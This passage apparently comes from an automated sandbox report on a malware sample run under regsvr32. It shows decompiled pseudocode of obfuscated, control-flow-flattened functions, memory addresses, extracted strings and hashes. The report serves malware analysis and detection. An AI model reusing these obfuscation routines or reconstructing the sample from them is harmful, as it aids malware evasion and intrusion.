										_t246 = 0xc02063;
										_t263 = 0x5c;
									} else {
										if(_t290 == 0xa5173af) {
											_t290 = 0xac8592e;
											continue;
										} else {
											if(_t290 == 0xac8592e) {
												_t255 =  *0x4b56214; // 0x0
												_t256 = _t255 + 0x23c;
												while( *_t256 != _t263) {
													_t256 = _t256 + 2;
													__eflags = _t256;
												}
												_t254 = _t256 + 2;
												_t290 = 0x79b4c83;
												_t246 = 0xc02063;
												continue;
											}
										}
									}
								}
								goto L17;
							}
							L04B353D0(_v40, _v12, _v16, _v8);
							_t290 = 0x61b9dc3;
							goto L16;
							L17:
							__eflags = _t290 - 0x61b9dc3;
						} while (__eflags != 0);
						return _v4;
					}
				}
			}

0x04b4dc71
0x04b4dc74
0x04b4dc7e
0x04b4dc85
0x04b4dc8d
0x04b4dc95
0x04b4dca1
0x04b4dca5
0x04b4dcb0
0x04b4dcb5
0x04b4dcbb
0x04b4dcc3
0x04b4dccb
0x04b4dcd7
0x04b4dcdc
0x04b4dce2
0x04b4dcea
0x04b4dcf2
0x04b4dcfa
0x04b4dd02
0x04b4dd07
0x04b4dd0f
0x04b4dd17
0x04b4dd1f
0x04b4dd24
0x04b4dd2c
0x04b4dd34
0x04b4dd39
0x04b4dd3e
0x04b4dd46
0x04b4dd4e
0x04b4dd56
0x04b4dd5b
0x04b4dd63
0x04b4dd6b
0x04b4dd73
0x04b4dd7b
0x04b4dd83
0x04b4dd8b
0x04b4dd93
0x04b4dd98
0x04b4dda4
0x04b4dda9
0x04b4ddaf
0x04b4ddb7
0x04b4ddbf
0x04b4ddc8
0x04b4ddcd
0x04b4ddd3
0x04b4ddd8
0x04b4dde0
0x04b4dde8
0x04b4ddf0
0x04b4ddf8
0x04b4de00
0x04b4de08
0x04b4de14
0x04b4de17
0x04b4de1d
0x04b4de2a
0x04b4de38
0x04b4de3b
0x04b4de3f
0x04b4de43
0x04b4de4b
0x04b4de58
0x04b4de5c
0x04b4de64
0x04b4de6c
0x04b4de74
0x04b4de7c
0x04b4de84
0x04b4de8c
0x04b4de94
0x04b4de99
0x04b4dea1
0x04b4dea9
0x04b4deb1
0x04b4deb9
0x04b4dec1
0x04b4dec9
0x04b4ded1
0x04b4ded9
0x04b4dede
0x04b4dee6
0x04b4def3
0x04b4def7
0x04b4deff
0x04b4df07
0x04b4df0f
0x04b4df17
0x04b4df1f
0x04b4df27
0x04b4df2f
0x04b4df34
0x04b4df3c
0x04b4df49
0x04b4df4d
0x04b4df55
0x04b4df5d
0x04b4df62
0x04b4df6a
0x04b4df72
0x04b4df7a
0x04b4df82
0x04b4df8a
0x04b4df92
0x04b4df9a
0x04b4dfa2
0x04b4dfa2
0x04b4dfa4
0x04b4dfa5
0x04b4dfa5
0x04b4dfaa
0x00000000
0x04b4dfaa
0x04b4dfb8
0x04b4e0a0
0x04b4e0a7
0x04b4e0aa
0x04b4e0ac
0x04b4e0b4
0x00000000
0x04b4dfbe
0x04b4dfc4
0x04b4e001
0x04b4e00a
0x04b4e00e
0x04b4e065
0x04b4e082
0x04b4e085
0x04b4e08a
0x04b4e0d6
0x04b4e0d8
0x04b4e0dd
0x04b4dfc6
0x04b4dfcc
0x04b4dffa
0x00000000
0x04b4dfce
0x04b4dfd4
0x04b4dfda
0x04b4dfe0
0x04b4dfeb
0x04b4dfe8
0x04b4dfe8
0x04b4dfe8
0x04b4dff0
0x04b4dff3
0x04b4dfa5
0x00000000
0x04b4dfa5
0x04b4dfd4
0x04b4dfcc
0x04b4dfc4
0x00000000
0x04b4dfb8
0x04b4e0cd
0x04b4e0d4
0x00000000
0x04b4e0de
0x04b4e0de
0x04b4e0de
0x04b4e0f1
0x04b4e0f1
0x04b4dfa5

Strings

fH, xrefs: 04B4DD3E
8+{, xrefs: 04B4DF3C
s~eP, xrefs: 04B4DCFA
H%, xrefs: 04B4DCE2
41, xrefs: 04B4DEA1
.|8, xrefs: 04B4DDB7
1, xrefs: 04B4DD98

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .|8$1$41$8+{$H%$fH$s~eP
API String ID: 0-3664284304
Opcode ID: 46935d32b15a87d0594613e55bfe34bb8c8909ce5beda6030ff0ac460e77336c
Instruction ID: c4538ea34d1a76c6bc45683064eedee520dbb1677b9d13d268ee2cca960d1dd5
Opcode Fuzzy Hash: 46935d32b15a87d0594613e55bfe34bb8c8909ce5beda6030ff0ac460e77336c
Instruction Fuzzy Hash: D5B11F725083809FD368CF25D48A40BFBE2FBC4748F10891DF29A86260D7B9D949CF46

Uniqueness

Uniqueness Score: -1.00%

Function 04B3670B, Relevance: 9.0, Strings: 7, Instructions: 232
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B3670B() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t233;
				signed int _t236;
				signed int _t238;
				void* _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t258;
				intOrPtr _t259;
				void* _t261;
				void* _t266;
				void* _t268;

				_v576 = 0x5c6bdc;
				_v572 = 0xae866a;
				_t259 = 0;
				_t261 = 0xb8e9ee3;
				_v568 = 0;
				_v612 = 0xec3aec;
				_t5 =  &_v612; // 0xec3aec
				_t241 = 0x62;
				_v612 =  *_t5 * 0x6c;
				_v612 = _v612 | 0xdabeec40;
				_v612 = _v612 ^ 0xfbbeff50;
				_v604 = 0x37b038;
				_v604 = _v604 >> 0xd;
				_v604 = _v604 ^ 0x000001bc;
				_v624 = 0x7f5f56;
				_v624 = _v624 + 0xffff5a99;
				_v624 = _v624 << 4;
				_v624 = _v624 ^ 0x07eb9ef3;
				_v628 = 0x55d92;
				_v628 = _v628 >> 0x10;
				_v628 = _v628 ^ 0x0529ff2d;
				_v628 = _v628 ^ 0x052de72a;
				_v664 = 0x989cfa;
				_v664 = _v664 * 0x6a;
				_v664 = _v664 | 0x8da787ac;
				_v664 = _v664 + 0xffffc08b;
				_v664 = _v664 ^ 0xbfb72d66;
				_v672 = 0x5126c1;
				_v672 = _v672 << 0xa;
				_v672 = _v672 | 0x6300e881;
				_v672 = _v672 * 0x1d;
				_v672 = _v672 ^ 0xbca67a4e;
				_v636 = 0x3defe6;
				_t49 =  &_v636; // 0x3defe6
				_v636 =  *_t49 * 9;
				_t51 =  &_v636; // 0x3defe6
				_v636 =  *_t51 * 0x52;
				_v636 = _v636 ^ 0xb28641ab;
				_v632 = 0xea2077;
				_t56 =  &_v632; // 0xea2077
				_v632 =  *_t56 * 0x65;
				_v632 = _v632 << 2;
				_v632 = _v632 ^ 0x7174f9be;
				_v660 = 0x2cce37;
				_v660 = _v660 << 0xd;
				_v660 = _v660 / _t241;
				_v660 = _v660 << 4;
				_v660 = _v660 ^ 0x1917ca80;
				_v676 = 0x92ca3e;
				_t242 = 0x12;
				_v676 = _v676 * 0x4b;
				_v676 = _v676 << 0xf;
				_v676 = _v676 >> 2;
				_v676 = _v676 ^ 0x28034127;
				_v596 = 0xf7772a;
				_v596 = _v596 + 0xffff3df8;
				_v596 = _v596 ^ 0x00fc52ab;
				_v644 = 0x6698d1;
				_v644 = _v644 | 0xc199dbe0;
				_v644 = _v644 ^ 0xc1fcc133;
				_v592 = 0x7143e7;
				_v592 = _v592 >> 2;
				_v592 = _v592 ^ 0x0010b3e1;
				_v652 = 0x9a4189;
				_v652 = _v652 * 0x60;
				_v652 = _v652 / _t242;
				_v652 = _v652 ^ 0x033cbda1;
				_v668 = 0xc5fab;
				_v668 = _v668 << 0xb;
				_v668 = _v668 >> 9;
				_v668 = _v668 + 0x8f67;
				_v668 = _v668 ^ 0x0031c4ff;
				_v600 = 0x6e8ee8;
				_v600 = _v600 ^ 0x0d880c60;
				_v600 = _v600 ^ 0x0deba949;
				_v616 = 0xb65c97;
				_v616 = _v616 + 0xffff6050;
				_v616 = _v616 << 6;
				_v616 = _v616 ^ 0x2d666d98;
				_v640 = 0xcc6d21;
				_t243 = 0x1b;
				_v640 = _v640 / _t243;
				_v640 = _v640 >> 0xe;
				_v640 = _v640 ^ 0x000eaea1;
				_v680 = 0x87d5f6;
				_t244 = 0x76;
				_v680 = _v680 * 0x1f;
				_v680 = _v680 << 9;
				_v680 = _v680 + 0xffff990b;
				_v680 = _v680 ^ 0xe5dd4258;
				_v608 = 0xe96961;
				_v608 = _v608 | 0xb6f9188e;
				_v608 = _v608 ^ 0xb6fb8930;
				_v656 = 0xc61929;
				_v656 = _v656 >> 2;
				_v656 = _v656 + 0xcacc;
				_v656 = _v656 << 2;
				_v656 = _v656 ^ 0x00c38b27;
				_v648 = 0x21afdf;
				_v648 = _v648 + 0x614;
				_v648 = _v648 + 0x692f;
				_v648 = _v648 ^ 0x002627a2;
				_v620 = 0xc6d0;
				_v620 = _v620 + 0xee3f;
				_t240 = _v608;
				_v620 = _v620 / _t244;
				_v620 = _v620 ^ 0x0005d3ba;
				do {
					while(_t261 != 0x885c2e) {
						if(_t261 == 0x1fa5b7d) {
							_t244 = _v628;
							_t233 = E04B50DB1(_t244,  &_v524, __eflags, _v664, _t244, _v672);
							_t268 = _t268 + 0xc;
							__eflags = _t233;
							if(__eflags != 0) {
								_t261 = 0x6c35f0b;
								continue;
							}
						} else {
							if(_t261 == 0x4edc737) {
								_push(_t244);
								_t236 = L04B4DBC1(_t240, _v652,  &_v564, _t244, _v668, _v600, _v616);
								_t258 = _v680;
								_t244 = _v640;
								asm("sbb esi, esi");
								_t261 = ( ~_t236 & 0xfe84828b) + 0x203d9a3;
								E04B51538(_t244, _t258, _t240);
								_t268 = _t268 + 0x1c;
								goto L14;
							} else {
								if(_t261 == 0x6c35f0b) {
									_t258 = _v636;
									_t244 =  &_v524;
									_t238 = E04B545CA(_t244, _t258, _t244, _t244, _v632, _v660, _v676, _v612, _v596, _v644, _t259, _v592, _v624, _v604);
									_t240 = _t238;
									_t268 = _t268 + 0x30;
									__eflags = _t238 - 0xffffffff;
									if(__eflags != 0) {
										_t261 = 0x4edc737;
										continue;
									}
								} else {
									if(_t261 == 0x8f2e6fb) {
										_t239 = E04B35477(_t244);
										_t266 = _v588 - _v548;
										asm("sbb ecx, [esp+0x9c]");
										__eflags = _v584 - _t258;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t259 = 1;
												__eflags = 1;
											} else {
												__eflags = _t266 - _t239;
												if(_t266 >= _t239) {
													goto L19;
												}
											}
										}
									} else {
										if(_t261 != 0xb8e9ee3) {
											goto L14;
										} else {
											_t261 = 0x1fa5b7d;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t259;
					}
					_t244 = _v608;
					L04B4CA1F(_t244, _v656,  &_v588, _v648, _v620);
					_t268 = _t268 + 0xc;
					_t261 = 0x8f2e6fb;
					L14:
					__eflags = _t261 - 0x203d9a3;
				} while (__eflags != 0);
				goto L20;
			}

0x04b36711
0x04b3671b
0x04b36727
0x04b36729
0x04b3672e
0x04b36735
0x04b3673d
0x04b36744
0x04b36747
0x04b3674b
0x04b36753
0x04b3675b
0x04b36763
0x04b36768
0x04b36770
0x04b36778
0x04b36780
0x04b36785
0x04b3678d
0x04b36795
0x04b3679a
0x04b367a2
0x04b367aa
0x04b367b7
0x04b367bb
0x04b367c3
0x04b367cb
0x04b367d3
0x04b367db
0x04b367e0
0x04b367ed
0x04b367f1
0x04b367f9
0x04b36801
0x04b36806
0x04b3680a
0x04b3680f
0x04b36813
0x04b3681b
0x04b36823
0x04b36828
0x04b3682c
0x04b36831
0x04b36839
0x04b36841
0x04b3684e
0x04b36852
0x04b36857
0x04b3685f
0x04b3686c
0x04b3686d
0x04b36871
0x04b36876
0x04b3687b
0x04b36883
0x04b3688b
0x04b36893
0x04b3689b
0x04b368a3
0x04b368ab
0x04b368b3
0x04b368bb
0x04b368c0
0x04b368c8
0x04b368d5
0x04b368df
0x04b368e5
0x04b368f2
0x04b368fa
0x04b368ff
0x04b36904
0x04b3690c
0x04b36914
0x04b3691c
0x04b36924
0x04b3692c
0x04b36934
0x04b3693c
0x04b36941
0x04b36949
0x04b36957
0x04b3695c
0x04b36962
0x04b36967
0x04b3696f
0x04b3697c
0x04b3697d
0x04b36981
0x04b36986
0x04b3698e
0x04b36996
0x04b3699e
0x04b369a6
0x04b369ae
0x04b369b6
0x04b369bb
0x04b369c3
0x04b369c8
0x04b369d0
0x04b369d8
0x04b369e0
0x04b369e8
0x04b369f0
0x04b369f8
0x04b36a06
0x04b36a0a
0x04b36a0e
0x04b36a16
0x04b36a16
0x04b36a24
0x04b36afb
0x04b36aff
0x04b36b04
0x04b36b07
0x04b36b09
0x04b36b0b
0x00000000
0x04b36b0b
0x04b36a2a
0x04b36a30
0x04b36aa5
0x04b36ac1
0x04b36ac6
0x04b36acc
0x04b36ad3
0x04b36adb
0x04b36ae1
0x04b36ae6
0x00000000
0x04b36a32
0x04b36a38
0x04b36a7b
0x04b36a81
0x04b36a88
0x04b36a8d
0x04b36a8f
0x04b36a92
0x04b36a95
0x04b36a9b
0x00000000
0x04b36a9b
0x04b36a3a
0x04b36a40
0x04b36b45
0x04b36b4e
0x04b36b59
0x04b36b60
0x04b36b62
0x04b36b64
0x04b36b6a
0x04b36b6c
0x04b36b6c
0x04b36b66
0x04b36b66
0x04b36b68
0x00000000
0x00000000
0x04b36b68
0x04b36b64
0x04b36a46
0x04b36a4c
0x00000000
0x04b36a52
0x04b36a52
0x00000000
0x04b36a52
0x04b36a4c
0x04b36a40
0x04b36a38
0x04b36a30
0x04b36b6d
0x04b36b79
0x04b36b79
0x04b36b25
0x04b36b2a
0x04b36b2f
0x04b36b32
0x04b36b37
0x04b36b37
0x04b36b37
0x00000000

Strings

=, xrefs: 04B36801
:, xrefs: 04B3673D
ai, xrefs: 04B36996
Cq, xrefs: 04B368B3
?, xrefs: 04B369F8
w , xrefs: 04B36823
/i, xrefs: 04B369E0

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /i$?$ai$w $:$Cq$=
API String ID: 0-170593755
Opcode ID: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction ID: 6bac28b845e3ea5e64e3fe316f431054eddc74be141359c0fd1ff934f73f0d4d
Opcode Fuzzy Hash: 6a76146150763d185147f5716e969069fdfaef2cf1abbd44bbf6199f519e4632
Instruction Fuzzy Hash: F0B120729083809FC368CF65C58A90BFBE1BBD4748F108A1DF5E9A6260D3B59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000A803, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A803(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x10057a08; // 0x7d1a16f8
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E1001808E(__edx,  &_v288, 4, "LOC"));
					E10009BC7(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10017D62(_t39));
					 *(E10017D62(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E10016E0C( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10017D62(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10017D62(__eflags)) = _t34;
					} else {
						E10009DD1( *((intOrPtr*)(E10017D62(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E100167D5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x1000a803
0x1000a803
0x1000a803
0x1000a803
0x1000a80c
0x1000a813
0x1000a816
0x1000a81e
0x1000a826
0x1000a89a
0x1000a89c
0x00000000
0x00000000
0x1000a89e
0x1000a828
0x1000a835
0x1000a836
0x1000a83b
0x1000a83e
0x1000a83e
0x1000a83f
0x1000a845
0x1000a84c
0x1000a85c
0x1000a871
0x1000a873
0x1000a878
0x1000a87b
0x1000a8a5
0x1000a87d
0x1000a884
0x1000a889
0x1000a8aa
0x1000a8bf
0x1000a8bf
0x1000a8b0
0x1000a8b7
0x1000a8b7
0x1000a8c1
0x1000a8c2
0x1000a8c2
0x1000a8cf

APIs

_strcpy_s.LIBCMT ref: 1000A830

Part of subcall function 10009BC7: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 10009BC7: __EH_prolog3.LIBCMT ref: 1000A0FC

Part of subcall function 10017D62: __getptd_noexit.LIBCMT ref: 10017D62

__snprintf_s.LIBCMT ref: 1000A869

Part of subcall function 10016E0C: __vsnprintf_s_l.LIBCMT ref: 10016E21

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 1000A894
LoadLibraryA.KERNEL32(?), ref: 1000A8B7

Strings

LOC, xrefs: 1000A828

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 4018564869-519433814
Opcode ID: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction ID: ee9450464cbd3e0ce3331b4d2b41357aa0e69ec1529eb2fe66138b72776ed960
Opcode Fuzzy Hash: 85c29d921faf756db8e7e017259237103e49a4f88e38b04ce28b663785a5d064
Instruction Fuzzy Hash: A9119A7190411CABF725D760DC86BDD37B8EF06790F504161F6049B191DF74AEC68BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04B4CCD9, Relevance: 7.7, Strings: 6, Instructions: 227
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E04B4CCD9(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				void* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				void* _t282;
				void* _t283;
				signed int _t285;
				signed int* _t287;
				signed int* _t288;

				_t287 =  &_v100;
				_v4 = _v4 & 0x00000000;
				_v8 = 0x71e8b0;
				_v36 = 0x18cf5b;
				_v36 = _v36 + 0x6698;
				_v36 = _v36 ^ 0x001a117a;
				_v60 = 0xa2890;
				_t282 = __edx;
				_t248 = __ecx;
				_t283 = 0x72ed85;
				_t250 = 0x42;
				_v60 = _v60 / _t250;
				_v60 = _v60 ^ 0xe73bacde;
				_v60 = _v60 ^ 0xe73fbe74;
				_v40 = 0x9c8291;
				_t251 = 0x70;
				_v40 = _v40 / _t251;
				_v40 = _v40 ^ 0x000cc374;
				_v64 = 0xa8df6e;
				_t252 = 0x66;
				_v64 = _v64 * 0x5a;
				_v64 = _v64 | 0x6df616d5;
				_v64 = _v64 ^ 0x7ff9e958;
				_v88 = 0xc174cb;
				_v88 = _v88 ^ 0xe7b64a13;
				_v88 = _v88 ^ 0xc84137a7;
				_v88 = _v88 << 0xc;
				_v88 = _v88 ^ 0x60915aca;
				_v32 = 0x752193;
				_v32 = _v32 * 0x3f;
				_v32 = _v32 ^ 0x1cda7702;
				_v92 = 0x141833;
				_v92 = _v92 + 0xffffc8f8;
				_v92 = _v92 + 0xf362;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0xd48431d2;
				_v96 = 0xc34044;
				_v96 = _v96 << 8;
				_v96 = _v96 + 0xffff536d;
				_v96 = _v96 + 0x5d23;
				_v96 = _v96 ^ 0xc334c852;
				_v20 = 0x3a6348;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x6343ca6d;
				_v56 = 0x49cd71;
				_v56 = _v56 ^ 0x72d9145f;
				_v56 = _v56 + 0x4f98;
				_v56 = _v56 ^ 0x7290366b;
				_v24 = 0x3bf83a;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x77f6a760;
				_v28 = 0x632842;
				_v28 = _v28 + 0xffffe69b;
				_v28 = _v28 ^ 0x006ee443;
				_v48 = 0x4b2ed5;
				_v48 = _v48 ^ 0x82c7a85b;
				_v48 = _v48 + 0xffff7c4b;
				_v48 = _v48 ^ 0x8282f052;
				_v52 = 0x4c7b52;
				_v52 = _v52 + 0xffffbc1f;
				_v52 = _v52 + 0x2e12;
				_v52 = _v52 ^ 0x004752b1;
				_v16 = 0x3a13fc;
				_v16 = _v16 / _t252;
				_v16 = _v16 ^ 0x00081e0d;
				_v84 = 0x8573c6;
				_t253 = 0x4b;
				_v84 = _v84 / _t253;
				_v84 = _v84 | 0x42242f90;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x00008b33;
				_v100 = 0x3509ce;
				_t254 = 0x19;
				_v100 = _v100 / _t254;
				_t285 = 0x44;
				_t255 = 0x6f;
				_v100 = _v100 * 0x31;
				_v100 = _v100 + 0x6b64;
				_v100 = _v100 ^ 0x006714bf;
				_v68 = 0x65eeb7;
				_v68 = _v68 + 0x24bd;
				_v68 = _v68 << 7;
				_v68 = _v68 ^ 0x330bb4b3;
				_v72 = 0x31388d;
				_v72 = _v72 * 0x77;
				_v72 = _v72 / _t285;
				_v72 = _v72 ^ 0x00560572;
				_v76 = 0x10ecc2;
				_v76 = _v76 | 0x28471304;
				_v76 = _v76 + 0xcdda;
				_v76 = _v76 ^ 0x285661a5;
				_v44 = 0xf32c83;
				_v44 = _v44 / _t255;
				_v44 = _v44 / _t285;
				_v44 = _v44 ^ 0x000ff213;
				_v80 = 0xb9f4a0;
				_v80 = _v80 << 0xa;
				_v80 = _v80 + 0xd38f;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00ede5ae;
				_v12 = 0x138f30;
				_v12 = _v12 ^ 0xf49e1969;
				_v12 = _v12 ^ 0xf48aec3a;
				while(1) {
					L1:
					_t242 = 0xd8fe181;
					do {
						L2:
						while(_t283 != 0x72ed85) {
							if(_t283 == 0xb6c7232) {
								_t278 = _v52;
								_t255 = _v48;
								_t243 = E04B51005(_v48, _v52, _v16, _v84,  *((intOrPtr*)(_t282 + 0x38)));
								_t287 =  &(_t287[3]);
								 *((intOrPtr*)(_t282 + 0x2c)) = _t243;
								__eflags = _t243;
								_t242 = 0xd8fe181;
								_t283 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t283 == 0xc5020c9) {
								_push(_v64);
								_t244 = L04B53263(_v36, _v60, __eflags, _t248, _v40, _t255);
								_t288 =  &(_t287[4]);
								 *((intOrPtr*)(_t282 + 0x38)) = _t244;
								__eflags = _t244;
								if(_t244 != 0) {
									E04B5148A(_t244, _t244, _v88, _v32, _v92, _v96);
									_t278 = _v56;
									_t255 = _v20;
									L04B3E2BD(_v56, _v24,  *((intOrPtr*)(_t282 + 0x38)), _v28);
									_t287 =  &(_t288[7]);
									_t283 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t283 == 0xd6f812a) {
									return E04B3F0E9(_v44,  *((intOrPtr*)(_t282 + 0x38)), _v80, _v12);
								}
								if(_t283 != _t242) {
									goto L13;
								} else {
									_t244 = E04B40EBC(_v100, _t278, _v68, _v100, _v72, _v76, _v100, _t255, _t282, E04B525F1);
									_t287 =  &(_t287[8]);
									 *((intOrPtr*)(_t282 + 0x48)) = _t244;
									if(_t244 == 0) {
										_t283 = 0xd6f812a;
										while(1) {
											L1:
											_t242 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t244;
						}
						_t283 = 0xc5020c9;
						L13:
						__eflags = _t283 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t242;
				}
			}

0x04b4ccd9
0x04b4ccdc
0x04b4cce1
0x04b4cce9
0x04b4ccf1
0x04b4ccf9
0x04b4cd01
0x04b4cd11
0x04b4cd13
0x04b4cd19
0x04b4cd1e
0x04b4cd23
0x04b4cd29
0x04b4cd31
0x04b4cd39
0x04b4cd45
0x04b4cd4a
0x04b4cd50
0x04b4cd58
0x04b4cd65
0x04b4cd66
0x04b4cd6a
0x04b4cd72
0x04b4cd7a
0x04b4cd82
0x04b4cd8a
0x04b4cd92
0x04b4cd97
0x04b4cd9f
0x04b4cdac
0x04b4cdb0
0x04b4cdb8
0x04b4cdc0
0x04b4cdc8
0x04b4cdd0
0x04b4cdd5
0x04b4cddd
0x04b4cde5
0x04b4cdea
0x04b4cdf2
0x04b4cdfa
0x04b4ce02
0x04b4ce0a
0x04b4ce0f
0x04b4ce17
0x04b4ce1f
0x04b4ce27
0x04b4ce2f
0x04b4ce37
0x04b4ce3f
0x04b4ce44
0x04b4ce4c
0x04b4ce54
0x04b4ce5c
0x04b4ce64
0x04b4ce6c
0x04b4ce74
0x04b4ce7c
0x04b4ce84
0x04b4ce8c
0x04b4ce94
0x04b4ce9c
0x04b4cea4
0x04b4ceb2
0x04b4ceb6
0x04b4cec0
0x04b4cece
0x04b4ced3
0x04b4ced7
0x04b4cedf
0x04b4cee4
0x04b4ceec
0x04b4cefa
0x04b4ceff
0x04b4cf0a
0x04b4cf0d
0x04b4cf0e
0x04b4cf12
0x04b4cf1a
0x04b4cf22
0x04b4cf2a
0x04b4cf32
0x04b4cf37
0x04b4cf3f
0x04b4cf4c
0x04b4cf58
0x04b4cf5c
0x04b4cf64
0x04b4cf6c
0x04b4cf74
0x04b4cf7c
0x04b4cf84
0x04b4cf94
0x04b4cfa3
0x04b4cfa7
0x04b4cfaf
0x04b4cfb7
0x04b4cfbc
0x04b4cfc4
0x04b4cfc9
0x04b4cfd1
0x04b4cfd9
0x04b4cfe1
0x04b4cfe9
0x04b4cfe9
0x04b4cfe9
0x04b4cfee
0x00000000
0x04b4cfee
0x04b4d000
0x04b4d0bc
0x04b4d0c0
0x04b4d0c4
0x04b4d0c9
0x04b4d0cc
0x04b4d0cf
0x04b4d0d3
0x04b4d0d8
0x00000000
0x04b4d0d8
0x04b4d00c
0x04b4d04e
0x04b4d060
0x04b4d065
0x04b4d068
0x04b4d06b
0x04b4d06d
0x04b4d087
0x04b4d097
0x04b4d09b
0x04b4d09f
0x04b4d0a4
0x04b4d0a7
0x00000000
0x04b4d0a7
0x04b4d00e
0x04b4d010
0x00000000
0x04b4d108
0x04b4d018
0x00000000
0x04b4d01e
0x04b4d037
0x04b4d03c
0x04b4d03f
0x04b4d044
0x04b4d04a
0x04b4cfe9
0x04b4cfe9
0x04b4cfe9
0x00000000
0x04b4cfe9
0x04b4cfe9
0x04b4d044
0x04b4d018
0x04b4d110
0x04b4d110
0x04b4d0e0
0x04b4d0e5
0x04b4d0e5
0x04b4d0e5
0x00000000
0x04b4cfee

Strings

Hc:, xrefs: 04B4CE02
#], xrefs: 04B4CDF2
dk, xrefs: 04B4CF12
Cn, xrefs: 04B4CE5C
R{L, xrefs: 04B4CE84
$P, xrefs: 04B4CD0F, 04B4D023

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

